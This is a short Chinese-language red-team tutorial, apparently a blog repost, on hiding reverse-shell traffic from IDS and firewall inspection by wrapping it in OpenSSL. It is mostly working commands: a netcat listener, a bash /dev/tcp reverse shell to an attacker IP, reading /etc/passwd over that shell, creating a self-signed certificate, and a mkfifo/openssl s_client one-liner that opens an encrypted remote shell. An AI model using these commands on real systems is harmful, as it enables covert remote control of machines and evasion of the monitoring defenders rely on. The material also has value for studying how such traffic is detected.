流量加密
使用Openssl反彈加密shell
如果反彈shell都是明文傳輸,當內網有IDS或者防護軟體就會進行流量分析,攻擊特征很快被發現,
如果藍隊對攻擊流量回溯分析,就可以復現攻擊的程序,此時紅隊攻擊就會被暴露出來,
使用wireshark抓包直接看到輸入的命令和回傳資訊,這些危險命令會被防火墻或者IPS檢測,所以需要對這些資訊進行混淆或加密,
未加密傳輸
攻擊機:192.168.31.217
目標機:192.168.152.130
攻擊機執行命令
nc -l 8080
目標機(kali)執行命令
bash -i >& /dev/tcp/192.168.31.217/8080 0>&1
反彈成功
隨意輸入兩個命令,再去wireshark內分析流量
id
cat /etc/passwd
到wireshark內,找到流量包進行分析
可以看到執行的命令被抓取,這些都會被報警,攻擊就會暴露,所以就需要采用加密傳輸
OpenSSL傳輸加密
OpenSSL是一個開放源代碼的軟體庫包,應用程式可以使用這個包來進行安全通信,避免竊聽并確認另一端連接者的身份
攻擊機上 OpenSSL 生成證書自簽名證書(rsa加密)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
開啟監聽
openssl s_server -quiet -key key.pem -cert cert.pem -port 8088
目標機上執行命令
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 攻擊機IP:埠> /tmp/s; rm /tmp/s
反彈成功
隨意輸入命令,再通過wireshark抓包,成功加密
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/283036.html
標籤:其他